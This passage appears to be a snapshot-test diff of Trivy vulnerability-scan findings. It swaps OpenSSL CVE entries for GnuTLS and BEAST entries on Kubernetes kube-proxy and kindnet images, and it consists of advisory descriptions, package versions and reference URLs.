"https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", - "https://github.com/advisories/GHSA-r7jw-wp68-3xch", - "https://linux.oracle.com/cve/CVE-2023-0215.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", - "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", - "https://security.netapp.com/advisory/ntap-20230427-0007/", - "https://security.netapp.com/advisory/ntap-20230427-0009/", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://ubuntu.com/security/notices/USN-5845-1", - "https://ubuntu.com/security/notices/USN-5845-2", - "https://www.cve.org/CVERecord?id=CVE-2023-0215", - "https://www.openssl.org/news/secadv/20230207.txt", + "https://access.redhat.com/errata/RHSA-2023:1141", + "https://access.redhat.com/security/cve/CVE-2023-0361", + "https://bugzilla.redhat.com/2162596", + "https://bugzilla.redhat.com/show_bug.cgi?id=2131152", + "https://bugzilla.redhat.com/show_bug.cgi?id=2162596", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0361", + "https://errata.almalinux.org/9/ALSA-2023-1141.html", + "https://errata.rockylinux.org/RLSA-2023:1569", + "https://github.com/tlsfuzzer/tlsfuzzer/pull/679", + "https://gitlab.com/gnutls/gnutls/-/issues/1050", + "https://gnutls.org/security-new.html#GNUTLS-SA-2020-07-14", + "https://linux.oracle.com/cve/CVE-2023-0361.html", + "https://linux.oracle.com/errata/ELSA-2023-1569.html", + "https://lists.debian.org/debian-lts-announce/2023/02/msg00015.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFIA3X4IZ3CW7SRQ2UHNHNPMRIAWF2FI/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WS4KVDOG6QTALWHC2QE4Y7VPDRMLTRWQ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z634YBXAJ5VLDI62IOPBVP5K6YFHAWCY/", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0361", + "https://security.netapp.com/advisory/ntap-20230324-0005/", + "https://ubuntu.com/security/notices/USN-5901-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0361", ], }, "category": "Vulnerability", - "description": "The public API function BIO_new_NDEF is a helper function used for streaming -ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the -SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by -end user applications. - -The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter -BIO onto the front of it to form a BIO chain, and then returns the new head of -the BIO chain to the caller. Under certain conditions, for example if a CMS -recipient public key is invalid, the new filter BIO is freed and the function -returns a NULL result indicating a failure. However, in this case, the BIO chain -is not properly cleaned up and the BIO passed by the caller still retains -internal pointers to the previously freed filter BIO. If the caller then goes on -to call BIO_pop() on the BIO then a use-after-free will occur. This will most -likely result in a crash. - - - -This scenario occurs directly in the internal function B64_write_ASN1() which -may cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on -the BIO. This internal function is in turn called by the public API functions -PEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream, -SMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7. - -Other public API functions that may be impacted by this include -i2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream and -i2d_PKCS7_bio_stream. - -The OpenSSL cms and smime command line applications are similarly affected. - - - -", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "A timing side-channel in the handling of RSA ClientKeyExchange messages was discovered in GnuTLS. This side-channel can be sufficient to recover the key encrypted in the RSA ciphertext across a network in a Bleichenbacher style attack. To achieve a successful decryption the attacker would need to send a large amount of specially crafted messages to the vulnerable server. By recovering the secret from the ClientKeyExchange message, the attacker would be able to decrypt the application data exchanged over that connection.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "use-after-free following BIO_new_NDEF", + "name": "timing side-channel in the TLS RSA key exchange code", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0215", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0215", + "value": "https://avd.aquasec.com/nvd/cve-2023-0361", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", + "value": "https://access.redhat.com/errata/RHSA-2023:1141", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", + "value": "https://access.redhat.com/security/cve/CVE-2023-0361", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", + "value": "https://bugzilla.redhat.com/2162596", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2131152", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2162596", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0361", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://errata.almalinux.org/9/ALSA-2023-1141.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "https://errata.rockylinux.org/RLSA-2023:1569", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://github.com/tlsfuzzer/tlsfuzzer/pull/679", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://gitlab.com/gnutls/gnutls/-/issues/1050", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://gnutls.org/security-new.html#GNUTLS-SA-2020-07-14", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://linux.oracle.com/cve/CVE-2023-0361.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "https://linux.oracle.com/errata/ELSA-2023-1569.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00015.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFIA3X4IZ3CW7SRQ2UHNHNPMRIAWF2FI/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WS4KVDOG6QTALWHC2QE4Y7VPDRMLTRWQ/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z634YBXAJ5VLDI62IOPBVP5K6YFHAWCY/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0361", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://security.netapp.com/advisory/ntap-20230324-0005/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://ubuntu.com/security/notices/USN-5901-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0361", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "3.6.7-4+deb10u9", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-4209", + "installedVersion": "3.6.7-4+deb10u5", + "packageName": "libgnutls30", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-4209", + "https://bugzilla.redhat.com/show_bug.cgi?id=2044156", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4209", + "https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568", + "https://gitlab.com/gnutls/gnutls/-/issues/1306", + "https://gitlab.com/gnutls/gnutls/-/merge_requests/1503", + "https://nvd.nist.gov/vuln/detail/CVE-2021-4209", + "https://security.netapp.com/advisory/ntap-20220915-0005/", + "https://ubuntu.com/security/notices/USN-5550-1", + "https://ubuntu.com/security/notices/USN-5750-1", + "https://www.cve.org/CVERecord?id=CVE-2021-4209", + ], + }, + "category": "Vulnerability", + "description": "A NULL pointer dereference flaw was found in GnuTLS. As Nettle's hash update functions internally call memcpy, providing zero-length input may cause undefined behavior. This flaw leads to a denial of service after authentication in rare circumstances.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "GnuTLS: Null pointer dereference in MD_UPDATE", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://avd.aquasec.com/nvd/cve-2021-4209", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://access.redhat.com/security/cve/CVE-2021-4209", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2044156", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4209", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://gitlab.com/gnutls/gnutls/-/issues/1306", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://gitlab.com/gnutls/gnutls/-/merge_requests/1503", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-4209", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://security.netapp.com/advisory/ntap-20220915-0005/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://ubuntu.com/security/notices/USN-5550-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://ubuntu.com/security/notices/USN-5750-1", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-4209", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-3389", + "installedVersion": "3.6.7-4+deb10u5", + "packageName": "libgnutls30", + "references": [ + "http://arcticdog.wordpress.com/2012/08/29/beast-openssl-and-apache/", + "http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/", + "http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", + "http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx", + "http://curl.haxx.se/docs/adv_20120124B.html", + "http://downloads.asterisk.org/pub/security/AST-2016-001.html", + "http://ekoparty.org/2011/juliano-rizzo.php", + "http://eprint.iacr.org/2004/111", + "http://eprint.iacr.org/2006/136", + "http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.html", + "http://isc.sans.edu/diary/SSL+TLS+part+3+/11635", + "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00001.html", + "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00002.html", + "http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.html", + "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", + "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", + "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", + "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", + "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", + "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", + "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html", + "http://marc.info/?l=bugtraq&m=132750579901589&w=2", + "http://marc.info/?l=bugtraq&m=132872385320240&w=2", + "http://marc.info/?l=bugtraq&m=133365109612558&w=2", + "http://marc.info/?l=bugtraq&m=133728004526190&w=2", + "http://marc.info/?l=bugtraq&m=134254866602253&w=2", + "http://marc.info/?l=bugtraq&m=134254957702612&w=2", + "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", + "http://osvdb.org/74829", + "http://rhn.redhat.com/errata/RHSA-2012-0508.html", + "http://rhn.redhat.com/errata/RHSA-2013-1455.html", + "http://secunia.com/advisories/45791", + "http://secunia.com/advisories/47998", + "http://secunia.com/advisories/48256", + "http://secunia.com/advisories/48692", + "http://secunia.com/advisories/48915", + "http://secunia.com/advisories/48948", + "http://secunia.com/advisories/49198", + "http://secunia.com/advisories/55322", + "http://secunia.com/advisories/55350", + "http://secunia.com/advisories/55351", + "http://security.gentoo.org/glsa/glsa-201203-02.xml", + "http://security.gentoo.org/glsa/glsa-201406-32.xml", + "http://support.apple.com/kb/HT4999", + "http://support.apple.com/kb/HT5001", + "http://support.apple.com/kb/HT5130", + "http://support.apple.com/kb/HT5281", + "http://support.apple.com/kb/HT5501", + "http://support.apple.com/kb/HT6150", + "http://technet.microsoft.com/security/advisory/2588513", + "http://vnhacker.blogspot.com/2011/09/beast.html", + "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", + "http://www.debian.org/security/2012/dsa-2398", + "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", + "http://www.ibm.com/developerworks/java/jdk/alerts/", + "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", + "http://www.insecure.cl/Beast-SSL.rar", + "http://www.kb.cert.org/vuls/id/864643", + "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", + "http://www.opera.com/docs/changelogs/mac/1151/", + "http://www.opera.com/docs/changelogs/mac/1160/", + "http://www.opera.com/docs/changelogs/unix/1151/", + "http://www.opera.com/docs/changelogs/unix/1160/", + "http://www.opera.com/docs/changelogs/windows/1151/", + "http://www.opera.com/docs/changelogs/windows/1160/", + "http://www.opera.com/support/kb/view/1004/", + "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", + "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", + "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", + "http://www.redhat.com/support/errata/RHSA-2011-1384.html", + "http://www.redhat.com/support/errata/RHSA-2012-0006.html", + "http://www.securityfocus.com/bid/49388", + "http://www.securityfocus.com/bid/49778", + "http://www.securitytracker.com/id/1029190", + "http://www.securitytracker.com/id?1025997", + "http://www.securitytracker.com/id?1026103", + "http://www.securitytracker.com/id?1026704", + "http://www.ubuntu.com/usn/USN-1263-1", + "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", + "https://access.redhat.com/security/cve/CVE-2011-3389", + "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", + "https://bugzilla.novell.com/show_bug.cgi?id=719047", + "https://bugzilla.redhat.com/show_bug.cgi?id=737506", + "https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", + "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", + "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", + "https://hermes.opensuse.org/messages/13154861", + "https://hermes.opensuse.org/messages/13155432", + "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", + "https://linux.oracle.com/cve/CVE-2011-3389.html", + "https://linux.oracle.com/errata/ELSA-2011-1380.html", + "https://nvd.nist.gov/vuln/detail/CVE-2011-3389", + "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752", + "https://ubuntu.com/security/notices/USN-1263-1", + "https://www.cve.org/CVERecord?id=CVE-2011-3389", + ], + }, + "category": "Vulnerability", + "description": "The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "HTTPS: block-wise chosen-plaintext attack against SSL/TLS (BEAST)", + "references": [ { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://avd.aquasec.com/nvd/cve-2011-3389", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", + "value": "http://arcticdog.wordpress.com/2012/08/29/beast-openssl-and-apache/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", + "value": "http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", + "value": "http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-r7jw-wp68-3xch", + "value": "http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0215.html", + "value": "http://curl.haxx.se/docs/adv_20120124B.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "http://downloads.asterisk.org/pub/security/AST-2016-001.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", + "value": "http://ekoparty.org/2011/juliano-rizzo.php", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", + "value": "http://eprint.iacr.org/2004/111", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", + "value": "http://eprint.iacr.org/2006/136", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230427-0009/", + "value": "http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "http://isc.sans.edu/diary/SSL+TLS+part+3+/11635", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-1", + "value": "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00001.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-2", + "value": "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00002.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0215", + "value": "http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.html", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0286", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2023-0286", - "https://access.redhat.com/security/cve/cve-2023-0286", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", - "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", - "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", - "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", - "https://linux.oracle.com/cve/CVE-2023-0286.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", - "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://ubuntu.com/security/notices/USN-5845-1", - "https://ubuntu.com/security/notices/USN-5845-2", - "https://www.cve.org/CVERecord?id=CVE-2023-0286", - "https://www.openssl.org/news/secadv/20230207.txt", - ], - }, - "category": "Vulnerability", - "description": "There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "X.400 address type confusion in X.509 GeneralName", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0286", + "value": "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", + "value": "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0286", + "value": "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2023-0286", + "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", + "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", + "value": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "http://marc.info/?l=bugtraq&m=132750579901589&w=2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "http://marc.info/?l=bugtraq&m=132872385320240&w=2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "http://marc.info/?l=bugtraq&m=133365109612558&w=2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "http://marc.info/?l=bugtraq&m=133728004526190&w=2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "http://marc.info/?l=bugtraq&m=134254866602253&w=2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "http://marc.info/?l=bugtraq&m=134254957702612&w=2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "http://osvdb.org/74829", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "http://rhn.redhat.com/errata/RHSA-2012-0508.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "http://rhn.redhat.com/errata/RHSA-2013-1455.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "http://secunia.com/advisories/45791", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "http://secunia.com/advisories/47998", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "http://secunia.com/advisories/48256", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "http://secunia.com/advisories/48692", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "http://secunia.com/advisories/48915", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "http://secunia.com/advisories/48948", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "http://secunia.com/advisories/49198", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "http://secunia.com/advisories/55322", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "http://secunia.com/advisories/55350", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "http://secunia.com/advisories/55351", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "http://security.gentoo.org/glsa/glsa-201203-02.xml", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "http://security.gentoo.org/glsa/glsa-201406-32.xml", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "http://support.apple.com/kb/HT4999", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "http://support.apple.com/kb/HT5001", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "http://support.apple.com/kb/HT5130", }, { "type": "URL", - 